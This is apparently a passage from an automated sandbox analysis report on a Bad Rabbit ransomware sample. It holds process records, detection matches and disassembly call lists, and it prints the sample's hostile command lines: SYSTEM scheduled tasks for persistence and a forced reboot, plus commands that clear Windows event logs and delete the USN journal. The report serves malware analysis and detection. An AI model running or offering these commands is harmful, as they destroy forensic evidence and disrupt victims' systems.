                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:9
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"
                                                                    Imagebase:0x840000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:10
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:11
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\2594.tmp
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\2594.tmp" \\.\pipe\{D8F326F0-A034-43D5-AD41-3DA9EEB64FB1}
                                                                    Imagebase:0x7ff73cfc0000
                                                                    File size:62'328 bytes
                                                                    MD5 hash:347AC3B6B791054DE3E5720A7144A977
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:12
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:13
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00
                                                                    Imagebase:0x840000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:14
                                                                    Start time:17:25:53
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
                                                                    Imagebase:0x240000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:15
                                                                    Start time:17:25:53
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:16
                                                                    Start time:17:25:53
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:wevtutil cl Setup
                                                                    Imagebase:0xae0000
                                                                    File size:208'384 bytes
                                                                    MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:17
                                                                    Start time:17:25:53
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:wevtutil cl System
                                                                    Imagebase:0xae0000
                                                                    File size:208'384 bytes
                                                                    MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:18
                                                                    Start time:17:25:53
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:wevtutil cl Security
                                                                    Imagebase:0xae0000
                                                                    File size:208'384 bytes
                                                                    MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:19
                                                                    Start time:17:25:53
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:wevtutil cl Application
                                                                    Imagebase:0xae0000
                                                                    File size:208'384 bytes
                                                                    MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:20
                                                                    Start time:17:25:53
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\fsutil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:fsutil usn deletejournal /D C:
                                                                    Imagebase:0x4d0000
                                                                    File size:167'440 bytes
                                                                    MD5 hash:452CA7574A1B2550CD9FF83DDBE87463
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:21
                                                                    Start time:17:25:54
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 3065482610 && exit
                                                                    Imagebase:0x7ff603690000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:22
                                                                    Start time:17:25:55
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:23
                                                                    Start time:17:25:55
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\dispci.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\dispci.exe" -id 3065482610
                                                                    Imagebase:0xdf0000
                                                                    File size:142'848 bytes
                                                                    MD5 hash:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                                                    • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 97%, ReversingLabs
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:24
                                                                    Start time:17:25:55
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:25
                                                                    Start time:17:25:55
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c schtasks /Delete /F /TN rhaegal
                                                                    Imagebase:0x240000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:26
                                                                    Start time:17:25:55
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:27
                                                                    Start time:17:25:56
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:schtasks /Delete /F /TN rhaegal
                                                                    Imagebase:0x840000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:28
                                                                    Start time:17:25:56
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c schtasks /Delete /F /TN drogon
                                                                    Imagebase:0x240000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:29
                                                                    Start time:17:25:56
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\LogonUI.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"LogonUI.exe" /flags:0x4 /state0:0xa3f61055 /state1:0x41c64e6d
                                                                    Imagebase:0x7ff75ff10000
                                                                    File size:13'824 bytes
                                                                    MD5 hash:893144FE49AA16124B5BD3034E79BBC6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:30
                                                                    Start time:17:25:56
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:31
                                                                    Start time:17:25:56
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:schtasks /Delete /F /TN drogon
                                                                    Imagebase:0x840000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:32
                                                                    Start time:17:25:56
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff6eef20000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:37
                                                                    Start time:17:25:58
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\cdd.dll
                                                                    Wow64 process (32bit):
                                                                    Commandline:
                                                                    Imagebase:
                                                                    File size:267'264 bytes
                                                                    MD5 hash:9B684213A399B4E286982BDAD6CF3D07
                                                                    Has elevated privileges:
                                                                    Has administrator privileges:
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:38
                                                                    Start time:17:25:58
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\LogonUI.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"LogonUI.exe" /flags:0x2 /state0:0xa3f6c855 /state1:0x41c64e6d
                                                                    Imagebase:0x7ff75ff10000
                                                                    File size:13'824 bytes
                                                                    MD5 hash:893144FE49AA16124B5BD3034E79BBC6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:40
                                                                    Start time:17:25:58
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\fontdrvhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"fontdrvhost.exe"
                                                                    Imagebase:0x7ff72c440000
                                                                    File size:827'408 bytes
                                                                    MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:44
                                                                    Start time:17:26:00
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\cdd.dll
                                                                    Wow64 process (32bit):
                                                                    Commandline:
                                                                    Imagebase:
                                                                    File size:267'264 bytes
                                                                    MD5 hash:9B684213A399B4E286982BDAD6CF3D07
                                                                    Has elevated privileges:
                                                                    Has administrator privileges:
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:45
                                                                    Start time:17:26:00
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\fontdrvhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"fontdrvhost.exe"
                                                                    Imagebase:0x7ff72c440000
                                                                    File size:827'408 bytes
                                                                    MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:46
                                                                    Start time:17:26:00
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\LogonUI.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"LogonUI.exe" /flags:0x2 /state0:0xa3f74055 /state1:0x41c64e6d
                                                                    Imagebase:0x7ff75ff10000
                                                                    File size:13'824 bytes
                                                                    MD5 hash:893144FE49AA16124B5BD3034E79BBC6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:52
                                                                    Start time:17:26:09
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\cdd.dll
                                                                    Wow64 process (32bit):
                                                                    Commandline:
                                                                    Imagebase:
                                                                    File size:267'264 bytes
                                                                    MD5 hash:9B684213A399B4E286982BDAD6CF3D07
                                                                    Has elevated privileges:
                                                                    Has administrator privileges:
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:53
                                                                    Start time:17:26:10
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\LogonUI.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"LogonUI.exe" /flags:0x2 /state0:0xa3f04055 /state1:0x41c64e6d
                                                                    Imagebase:0x7ff75ff10000
                                                                    File size:13'824 bytes
                                                                    MD5 hash:893144FE49AA16124B5BD3034E79BBC6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:55
                                                                    Start time:17:26:10
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\fontdrvhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"fontdrvhost.exe"
                                                                    Imagebase:0x7ff72c440000
                                                                    File size:827'408 bytes
                                                                    MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:3.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:29.1%
                                                                      Total number of Nodes:86
                                                                      Total number of Limit Nodes:10
                                                                      execution_graph 2377 c012c0 2397 c01660 2377->2397 2380 c01487 2425 c01499 2380->2425 2381 c012eb GetCommandLineW CommandLineToArgvW 2381->2380 2382 c0130f 2381->2382 2384 c01339 wcsstr 2382->2384 2388 c01318 GetSystemDirectoryW 2382->2388 2384->2388 2385 c01495 2387 c013a9 lstrcatW 2387->2380 2389 c013c3 2387->2389 2388->2380 2388->2387 2399 c010c0 GetModuleHandleW GetModuleFileNameW 2389->2399 2391 c013d5 2391->2380 2420 c01260 CreateFileW 2391->2420 2394 c013f9 wsprintfW 2395 c01430 2394->2395 2395->2395 2396 c01449 CreateProcessW ExitProcess 2395->2396 2398 c012cd GetCommandLineW 2397->2398 2398->2380 2398->2381 2400 c0110d 2399->2400 2401 c0123e 2399->2401 2429 c01000 CreateFileW 2400->2429 2402 c01499 4 API calls 2401->2402 2404 c0124b 2402->2404 2404->2391 2405 c01126 2405->2401 2406 c0112e GetProcessHeap HeapAlloc 2405->2406 2408 c01225 2406->2408 2409 c01189 memcpy 2406->2409 2410 c01499 4 API calls 2408->2410 2411 c011aa GetProcessHeap RtlAllocateHeap 2409->2411 2412 c0119e 2409->2412 2413 c01238 2410->2413 2414 c011d0 2411->2414 2417 c011e5 GetProcessHeap HeapFree 2411->2417 2412->2411 2413->2391 2438 c01690 2414->2438 2418 c01499 4 API calls 2417->2418 2419 c0121f 2418->2419 2419->2391 2421 c01284 WriteFile 2420->2421 2422 c012aa 2420->2422 2423 c012a3 CloseHandle 2421->2423 2424 c01299 2421->2424 2422->2380 2422->2394 2423->2422 2424->2423 2426 c014a1 2425->2426 2427 c014a4 SetUnhandledExceptionFilter UnhandledExcep GetCurrentProcess TerminateProcess 2425->2427 2426->2385 2427->2385 2430 c010b5 2429->2430 2431 c0102b GetFileSize 2429->2431 2430->2405 2432 c010a3 CloseHandle 2431->2432 2433 c01039 GetProcessHeap HeapAlloc 2431->2433 2432->2405 2434 c01050 ReadFile 2433->2434 2435 c01091 2433->2435 2434->2435 2436 c0106a 2434->2436 2435->2432 2436->2435 2437 c0106f GetProcessHeap HeapFree CloseHandle 2436->2437 2437->2405 2439 c016c9 2438->2439 2441 c016d9 2439->2441 2442 c0173c 2439->2442 2441->2417 2446 c01dd0 2442->2446 2447 c01750 2442->2447 2443 c01b8f memcpy 2443->2447 2444 c02a4f 2444->2446 2448 c02dcb 2444->2448 2446->2441 2447->2443 2447->2444 2447->2446 2449 c02de1 2448->2449 2450 c02e21 memcpy 2449->2450 2451 c02e39 memcpy 2449->2451 2453 c02dfa 2449->2453 2450->2453 2452 c02e58 memcpy 2451->2452 2451->2453 2452->2453 2453->2446 2454 c01be4 2458 c017be 2454->2458 2455 c02a4f 2456 c02dcb 3 API calls 2455->2456 2457 c01dd0 2455->2457 2456->2457 2458->2455 2458->2457 2459 c01b8f memcpy 2458->2459 2459->2458 2460 c033a6 free 2481 c033ef 2482 c033ed 2481->2482 2483 c03396 malloc 2481->2483 2482->2481 2484 c033f9 2482->2484 2485 c03393 2486 c03396 malloc 2485->2486 2487 c028d5 2488 c028df 2487->2488 2489 c02dcb 3 API calls 2488->2489 2490 c01dd2 2488->2490 2489->2490 2491 c01f3b 2493 c01f4f 2491->2493 2492 c02012 2495 c02dcb 3 API calls 2492->2495 2496 c01dd2 2492->2496 2493->2492 2494 c01fe4 memcpy 2493->2494 2494->2492 2495->2496

                                                                      Callgraph

                                                                      Executed Functions

                                                                      Function 00C010C0 Relevance: 13.6, APIs: 9, Instructions: 133memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,0000030C,?), ref: 00C010F8
                                                                      • GetModuleFileNameW.KERNEL32(00000000), ref: 00C010FF
                                                                        • Part of subcall function 00C01000: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 00C0101A
                                                                        • Part of subcall function 00C01000: GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 00C0102D
                                                                        • Part of subcall function 00C01000: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00C0103D
                                                                        • Part of subcall function 00C01000: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00C01044
                                                                        • Part of subcall function 00C01000: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 00C01060
                                                                        • Part of subcall function 00C01000: GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 00C01071
                                                                        • Part of subcall function 00C01000: HeapFree.KERNEL32(00000000,?,?), ref: 00C01078
                                                                        • Part of subcall function 00C01000: CloseHandle.KERNEL32(00000000,?), ref: 00C01080
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?), ref: 00C01172
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,?,?), ref: 00C01179
                                                                      • memcpy.MSVCRT(00000000,?,?,?,00000000,?,?), ref: 00C01192
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?), ref: 00C011BB
                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00C011BE
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C01207
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C0120A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$File$AllocFreeHandleModule$AllocateCloseCreateNameReadSizememcpy
                                                                      • String ID:
                                                                      • API String ID: 796136525-0
                                                                      • Opcode ID: 5a408703817e7cdcaefa884f17487b310ab8d1d099b348e4f23a699191b5ca07
                                                                      • Instruction ID: bc49448e96db7803a070a8ae44cbb0c9a4d02928bd07f647fc2ee0ea576ea37a
                                                                      • Opcode Fuzzy Hash: 5a408703817e7cdcaefa884f17487b310ab8d1d099b348e4f23a699191b5ca07
                                                                      • Instruction Fuzzy Hash: 1641C6B1A001189BDB24DF65DC44BAEF7B9FF98304F054199EA0597291DA31DE54CFA0
                                                                      Function 00C012C0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 138processstringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCommandLineW.KERNEL32 ref: 00C012DF
                                                                      • GetCommandLineW.KERNEL32 ref: 00C012FC
                                                                      • CommandLineToArgvW.SHELL32(00000000), ref: 00C012FF
                                                                      • wcsstr.MSVCRT ref: 00C0133D
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00C0139B
                                                                      • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 00C013B5
                                                                      • wsprintfW.USER32 ref: 00C01418
                                                                      • CreateProcessW.KERNELBASE ref: 00C01479
                                                                      • ExitProcess.KERNEL32 ref: 00C01481
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID: CommandLine$Process$ArgvCreateDirectoryExitSystemlstrcatwcsstrwsprintf
                                                                      • String ID: %ws C:\Windows\%ws,#1 %ws$D$\rundll32.exe$infpub.dat
                                                                      • API String ID: 39178828-1758013632
                                                                      • Opcode ID: addb9b95cd78fc984df22131446f0d9db7b53873cca112e59206bfd13e977095
                                                                      • Instruction ID: e719c67b6125a1bd2eb21f636b5bc9a9f518363eec12f3bed8bb20fbfab97482
                                                                      • Opcode Fuzzy Hash: addb9b95cd78fc984df22131446f0d9db7b53873cca112e59206bfd13e977095
                                                                      • Instruction Fuzzy Hash: 7641A1719002189BDB28DF94CC95BEEB378EF44745F094299EE06D71A0EB709F64CB60
                                                                      Function 00C01000 Relevance: 13.6, APIs: 9, Instructions: 79memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 00C0101A
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 00C0102D
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00C0103D
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00C01044
                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 00C01060
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 00C01071
                                                                      • HeapFree.KERNEL32(00000000,?,?), ref: 00C01078
                                                                      • CloseHandle.KERNEL32(00000000,?), ref: 00C01080
                                                                      • CloseHandle.KERNELBASE(00000000,?,?,?), ref: 00C010A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$File$CloseHandleProcess$AllocCreateFreeReadSize
                                                                      • String ID:
                                                                      • API String ID: 2825476172-0
                                                                      • Opcode ID: 3ba3da0fae99e4cff5aabaff1aa47d79fcbc2f7c7b8dd8442a55aeea2c3eac23
                                                                      • Instruction ID: 7bea212d3a8393ad51f4f628accc66d3f941131012dacc82bba691a6124aaf49
                                                                      • Opcode Fuzzy Hash: 3ba3da0fae99e4cff5aabaff1aa47d79fcbc2f7c7b8dd8442a55aeea2c3eac23
                                                                      • Instruction Fuzzy Hash: 4D2151B2601214ABC730ABA5AC8CF9FBF6CEB45766F114155FA49A2250D6318940C7A0
                                                                      Function 00C01260 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
